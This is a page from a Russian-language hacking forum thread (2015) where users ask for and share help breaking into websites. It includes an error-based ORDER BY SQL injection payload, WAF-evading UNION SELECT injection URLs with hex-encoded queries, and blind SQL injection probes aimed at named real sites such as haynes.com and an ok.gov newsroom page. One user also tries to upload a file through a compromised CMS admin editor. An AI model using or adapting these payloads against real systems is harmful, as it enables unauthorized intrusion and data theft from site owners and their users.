HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 28 из 296 « Первая < 18 24 25 26 27 28 29 30 31 32 3878128 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #271  
Старый 02.07.2015, 14:55
reuvenmatbil
Guest
Сообщений: n/a
Провел на форуме:
5818

Репутация: 0
По умолчанию
В админке есть возможность редактировать html

не могу найти html загрузчик

кто может подсказать код?
 
Ответить с цитированием

  #272  
Старый 02.07.2015, 15:16
frank
Guest
Сообщений: n/a
Провел на форуме:
56887

Репутация: 28
По умолчанию
Цитата:
Сообщение от reuvenmatbil  
reuvenmatbil said:

В админке есть возможность редактировать html
не могу найти html загрузчик
кто может подсказать код?
Я может не так понял конечно, вы это имели ввиду?

Код:
Code:
http://htmlbook.ru/samhtml5/formy/zagruzka-failov
 
Ответить с цитированием

  #273  
Старый 02.07.2015, 15:41
reuvenmatbil
Guest
Сообщений: n/a
Провел на форуме:
5818

Репутация: 0
По умолчанию
Цитата:
Сообщение от frank  
frank said:

Я может не так понял конечно, вы это имели ввиду?
Код:
Code:
http://htmlbook.ru/samhtml5/formy/zagruzka-failov
да, он, но файл не хочет загружаться
 
Ответить с цитированием

  #274  
Старый 02.07.2015, 16:30
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию
Ты никак не загрузишь файл через html.
 
Ответить с цитированием

  #275  
Старый 02.07.2015, 17:01
reuvenmatbil
Guest
Сообщений: n/a
Провел на форуме:
5818

Репутация: 0
По умолчанию
Цитата:
Сообщение от kingbeef  
kingbeef said:

Ты никак не загрузишь файл через html.
стоит движок FCKeditor

можно только редактировать хтмл

то что на форуме обсуждали

/threads/314734/

/thread170379.html

/threadnav141783-2-10.html

не подошло
 
Ответить с цитированием

  #276  
Старый 02.07.2015, 19:43
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию
 
Ответить с цитированием

  #277  
Старый 02.07.2015, 20:23
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию
Цитата:
Сообщение от DezMond™  
DezMond™ said:

Хелп
Инъекция в ORDER BY, Error-based;

Код:
Code:
DESC,error-based
DESC, updatexml(1, concat(0x3A, version()), 1)
reuvenmatbil,Никак нельзя. Ваш вопрос, более того, некорректен.
 
Ответить с цитированием

  #278  
Старый 02.07.2015, 21:30
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию
Цитата:
Сообщение от DezMond™  
DezMond™ said:

У кого получиться фильтр обойти?
За это конечно спасибо. Вариантов, как обычно, несколько.

Код:
Code:
index.php?id=9528&catId=177 UNION /*I j n t e h h n f d j i e  v o m i r v e r a e l l e r i r e c t  a t z u n d o p t i k n n e n*/ SELECT UNHEX /*I j n t e h h n f d j i e  v o m i r v e r a e l l e r i r e c t  a t z u n d o p t i k n n e n*/('3629554E494F4E2053454C45435420312C322C332C342C352C362C372C382C392C302C312C76657273696F6E28292C332C342C352C362C372C382C392C302C312C342C332C342C352C362C372C382C392C302C312C352C332C342C352C362C372C382C392C302C312C362C332C342C352C362C372C382C392C302C312C372C332C342C352C362C372C382C3923')&origin=search&no_cache=1
index.php?id=9528&catId=177 UNION /*I j n t e h h n f d j i e  v o m i r v e r a e l l e r i r e c t  a t z u n d o p t i k n n e n*/ SELECT x'3629554E494F4E2053454C45435420312C322C332C342C352C362C372C382C392C302C312C76657273696F6E28292C332C342C352C362C372C382C392C302C312C342C332C342C352C362C372C382C392C302C312C352C332C342C352C362C372C382C392C302C312C362C332C342C352C362C372C382C392C302C312C372C332C342C352C362C372C382C3923'&origin=search&no_cache=1
index.php?id=9528&catId=177.0UNION/**/SELECT x'3629554E494F4E2053454C45435420312C322C332C342C352C362C372C382C392C302C312C76657273696F6E28292C332C342C352C362C372C382C392C302C312C342C332C342C352C362C372C382C392C302C312C352C332C342C352C362C372C382C392C302C312C362C332C342C352C362C372C382C392C302C312C372C332C342C352C362C372C382C3923'&origin=search&no_cache=1
MySQL 5.5.27.
 
Ответить с цитированием

  #279  
Старый 02.07.2015, 21:47
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию
Цитата:
Сообщение от Br@!ns  
Br@!ns said:

Помогите waf обойти и вывод получить
А где вы SQL Injection обнаружили? Вроде чисто.
 
Ответить с цитированием

  #280  
Старый 02.07.2015, 22:55
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию
Цитата:
Сообщение от XAMEHA  
XAMEHA said:

А где вы SQL Injection обнаружили? Вроде чисто.
ну как.

http://www.haynes.com/products?sear...=2009&make=Boatian&model=BT125-3'+and+1=1+--+ - TRUE

http://www.haynes.com/products?sear...=2009&make=Boatian&model=BT125-3'+and+1=2+--+ - FALSE

А так же http://www.haynes.com/products?sear...09&make=Boatian&model=BT125-3'+Order+by+2+--+ - TRUE

новость вылазиет при true. так же при некоторых командах вылазиет белая страничка

2) А тут можно что нибудь сделать?

http://www.ok.gov/triton/modules/new...123,1,1)=1+--+

http://www.ok.gov/triton/modules/new...order+by+1+--+

http://www.ok.gov/triton/modules/newsroom/newsroom.php?id=109+and+substr('a',1,1)='a'
 
Ответить с цитированием
Ответ
Страница 28 из 296 « Первая < 18 24 25 26 27 28 29 30 31 32 3878128 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ